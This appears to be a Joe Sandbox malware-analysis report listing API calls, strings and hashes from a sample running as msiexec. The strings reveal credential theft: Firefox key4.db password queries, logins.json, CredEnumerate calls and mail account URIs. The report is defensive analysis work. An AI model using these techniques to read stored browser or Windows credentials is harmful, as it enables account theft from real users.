                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                • DeleteObject.GDI32(?), ref: 00401226
                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                • ShowWindow.USER32(00000000), ref: 00401253
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                • ShowWindow.USER32(00000000), ref: 00401262
                                                                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                • memset.MSVCRT ref: 0040128E
                                                                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                • String ID:
                                                                                • API String ID: 2998058495-0
                                                                                • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                APIs
                                                                                • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp$memcpy
                                                                                • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                • API String ID: 231171946-2189169393
                                                                                • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                • API String ID: 633282248-1996832678
                                                                                • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00406782
                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                Strings
                                                                                • , xrefs: 00406834
                                                                                • key4.db, xrefs: 00406756
                                                                                • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memcmp$memsetstrlen
                                                                                • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                • API String ID: 3614188050-3983245814
                                                                                • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: sprintf$memset$_mbscpy
                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                • API String ID: 3402215030-3842416460
                                                                                • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                APIs
                                                                                  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                  • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                  • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                • strlen.MSVCRT ref: 0040F139
                                                                                • strlen.MSVCRT ref: 0040F147
                                                                                • memset.MSVCRT ref: 0040F187
                                                                                • strlen.MSVCRT ref: 0040F196
                                                                                • strlen.MSVCRT ref: 0040F1A4
                                                                                • memset.MSVCRT ref: 0040F1EA
                                                                                • strlen.MSVCRT ref: 0040F1F9
                                                                                • strlen.MSVCRT ref: 0040F207
                                                                                • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                • API String ID: 2003275452-3138536805
                                                                                • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C3F7
                                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                • strrchr.MSVCRT ref: 0040C417
                                                                                • _mbscat.MSVCRT ref: 0040C431
                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                • API String ID: 1012775001-1343505058
                                                                                • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00444612
                                                                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                • strlen.MSVCRT ref: 0044462E
                                                                                • memset.MSVCRT ref: 00444668
                                                                                • memset.MSVCRT ref: 0044467C
                                                                                • memset.MSVCRT ref: 00444690
                                                                                • memset.MSVCRT ref: 004446B6
                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                  • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpymemset$strlen$_mbscpy
                                                                                • String ID: salu
                                                                                • API String ID: 3691931180-4177317985
                                                                                • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                • API String ID: 2449869053-232097475
                                                                                • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                APIs
                                                                                • sprintf.MSVCRT ref: 0040957B
                                                                                • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                  • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                • sprintf.MSVCRT ref: 004095EB
                                                                                • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                • memset.MSVCRT ref: 0040961C
                                                                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                • String ID: caption$dialog_%d$menu_%d
                                                                                • API String ID: 3259144588-3822380221
                                                                                • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                APIs
                                                                                  • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                • API String ID: 2449869053-4258758744
                                                                                • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                APIs
                                                                                • wcsstr.MSVCRT ref: 0040426A
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                • strchr.MSVCRT ref: 004042F6
                                                                                • strlen.MSVCRT ref: 0040430A
                                                                                • sprintf.MSVCRT ref: 0040432B
                                                                                • strchr.MSVCRT ref: 0040433C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                • String ID: %s@gmail.com$www.google.com
                                                                                • API String ID: 3866421160-4070641962
                                                                                • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                APIs
                                                                                • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                  • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                  • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                  • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                • memset.MSVCRT ref: 004097BD
                                                                                • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                • API String ID: 1035899707-3647959541
                                                                                • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                • API String ID: 2360744853-2229823034
                                                                                • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                APIs
                                                                                • strchr.MSVCRT ref: 004100E4
                                                                                • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                  • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                  • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                • _mbscat.MSVCRT ref: 0041014D
                                                                                • memset.MSVCRT ref: 00410129
                                                                                  • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                  • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                • memset.MSVCRT ref: 00410171
                                                                                • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                • _mbscat.MSVCRT ref: 00410197
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                • String ID: \systemroot
                                                                                • API String ID: 912701516-1821301763
                                                                                • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                APIs
                                                                                  • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
                                                                                • memcpy.MSVCRT(?,-wal,00000005,?,?,?,?,?,?,?,?,?,00000000,00000000,004067AF), ref: 004198BA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000A.00000002.2632986785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$strlen
                                                                                • String ID: -journal$-wal$immutable$nolock
                                                                                • API String ID: 2619041689-3408036318
